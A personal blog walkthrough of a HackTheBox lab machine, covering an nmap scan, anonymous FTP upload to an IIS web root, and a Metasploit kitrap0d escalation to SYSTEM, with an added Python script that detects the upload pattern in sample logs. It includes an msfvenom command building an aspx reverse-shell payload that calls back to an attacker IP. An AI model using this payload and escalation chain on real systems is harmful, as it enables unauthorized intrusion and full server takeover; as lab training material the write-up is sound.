Hi! My name is Rupe and I am currently studying to be a Penetration Tester. I am going to be posting various walkthroughs of the boxes I complete along the way. This will not only help me learn the techniques and methodologies better but I hope it will also help someone down the road who is just starting out on the Pen Testing path.
Step 1 : Initial Scanning and Enumeration
HTB gives you the IP address of the machine when you spin it up. We will start with an NMAP scan to see what ports are open.
nmap -T4 -p- -A 10.10.10.5 -Pn
We can see that port 21 and port 80 are open. Port 21 is running file transfer protocol (ftp) and port 80 is running an IIS web server. Also note that anonymous login is allowed on port 21. This means we do not have to be an authenticated user to connect.
I logged into the FTP server using Username : anonymous and it was successful. Let's test whether we are able to upload a file. To create the test file, use the following command :
echo "hello" > hello.txt
Now we are going to try and upload this test file to the server.
We can verify that the file reached the web root by browsing to it on the website.
And there we go! The file has been uploaded. This means any file uploaded via FTP is served by the web server, because the FTP root and the web root are the same directory. Now why is this a problem? Well, all we did was upload a simple .txt file… what if we made it malicious?
Step 2 : Exploitation
Doing some research I found out that you should test executable file extensions on an IIS server. The 4 main ones are asp, aspx, config, and php (https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services). I chose to try aspx.
So now we will create a payload using msfvenom. Here is the command :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=4444 -f aspx > reverse.aspx
Now that the payload has been created, let's upload it via FTP.
The payload has been uploaded to the web server. Let's open up Metasploit and set up a handler to see if we can get a shell now.
Once you set up all of the options (exploit, payload, lhost, and lport) we can type in run and start listening. To pop a shell, browse to the reverse.aspx file we uploaded to the web server; IIS executes it and the reverse connection comes back to the handler.
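As an added defender-side example (not part of the original walkthrough), this Python script correlates FTP upload events with IIS access events over constructed sample log lines and flags the exact pattern this step relies on: an anonymous STOR of a file with an executable extension that is then fetched over HTTP. The simplified log field order, the IPs and the timestamps are assumptions.

```python
from dataclasses import dataclass
from typing import List, Tuple

# File extensions IIS will execute rather than serve as static content
# (the set the walkthrough names: asp, aspx, config, php).
EXECUTABLE_EXTS = (".asp", ".aspx", ".config", ".php")

# Constructed sample logs, not real logs from the box. The simplified W3C-style
# field order (date time c-ip cs-username cs-method cs-uri-stem sc-status) is an assumption.
FTP_LOG = """\
2023-01-01 10:00:01 10.10.14.2 anonymous STOR /hello.txt 226
2023-01-01 10:02:15 10.10.14.2 anonymous STOR /reverse.aspx 226
2023-01-01 10:03:00 10.10.14.9 ftpuser STOR /report.pdf 226
"""
HTTP_LOG = """\
2023-01-01 10:00:30 10.10.14.2 - GET /hello.txt 200
2023-01-01 10:02:40 10.10.14.2 - GET /reverse.aspx 200
2023-01-01 10:03:10 10.10.14.9 - GET /report.pdf 200
"""

@dataclass
class Event:
    ts: str       # "YYYY-MM-DD HH:MM:SS", so string comparison orders by time
    ip: str
    user: str
    method: str
    path: str
    status: str

def parse(log: str) -> List[Event]:
    """Parse the simplified W3C lines, skipping blank lines and '#' directives."""
    events = []
    for line in log.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        date, time, ip, user, method, path, status = line.split()
        events.append(Event(f"{date} {time}", ip, user, method, path, status))
    return events

def correlate(ftp_log: str, http_log: str) -> List[Tuple[Event, Event]]:
    """Return (upload, request) pairs: an executable file stored over FTP
    (226 = transfer complete) and later fetched over HTTP from the same path,
    which is the evidence that the FTP root is also the IIS web root."""
    uploads = [e for e in parse(ftp_log)
               if e.method == "STOR" and e.status == "226"
               and e.path.lower().endswith(EXECUTABLE_EXTS)]
    gets = [e for e in parse(http_log) if e.method == "GET"]
    return [(up, req) for up in uploads for req in gets
            if req.path == up.path and req.ts > up.ts]
```

The benign hello.txt and the authenticated PDF upload are ignored; only the anonymous reverse.aspx upload followed by its HTTP fetch is returned, which is the event a SOC would want to alert on (or, better, prevent by keeping the FTP root outside the web root and disabling anonymous writes).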
Step 3 : Post-Exploitation / Privilege Escalation
And there we have it. We have gained a low-level shell on the server. Let's do some enumeration and see what we do and don't have access to.
After poking around, we find we do not have access to very much. Let's try to elevate our privileges using Metasploit's local_exploit_suggester (https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/).
After running the local exploit suggester, we can see that there are numerous exploits we could try. We will be using kitrap0d for this machine. Let's set up Metasploit to prepare for the kitrap0d exploit.
When we run this, the exploit launches and is successful. We are now NT AUTHORITY\SYSTEM.
Let's try to access the users' Desktops now.
Step 4 : Do a little Happy Dance since you found the root flag
As you can see, we now have access to both babis's desktop and the Administrator's desktop.
The user flag can be found in c:\Users\babis\Desktop in the file user.txt.
The root flag can be found in c:\Users\Administrator\Desktop in the file root.txt.
If I showed you the flags for HackTheBox that would be too easy. You can go find them :)
I am not a professional by any means. There are many different ways to complete this box, this is just the way I decided to do it. If you have any feedback or suggestions, feel free to let me know! Happy Hacking!
HTB Profile : https://app.hackthebox.com/profile/1463629